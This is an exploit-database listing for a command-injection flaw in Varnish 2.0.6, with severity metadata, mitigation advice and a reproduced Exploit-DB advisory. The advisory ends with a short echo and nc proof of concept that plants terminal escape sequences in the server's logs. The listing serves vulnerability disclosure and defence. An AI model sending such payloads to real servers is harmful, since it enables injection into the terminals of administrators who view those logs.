Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Command Injection Vulnerability in Varnish - exploit.company
header-logo
Suggest Exploit
vendor:
Varnish
by:
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: Varnish
Affected Version From: 2.0.6
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:varnish-cache:varnish:2.0.6
Metasploit:
Other Scripts:
Platforms Tested:

Command Injection Vulnerability in Varnish

Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. Attackers can exploit this issue to execute arbitrary commands in a terminal.

Mitigation:

Update to a patched version of Varnish. Sanitize and validate user-supplied input before using it in logfiles.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37713/info

Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.

Attackers can exploit this issue to execute arbitrary commands in a terminal.

Varnish 2.0.6 is vulnerable; other versions may also be affected. 

The following example is available:

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload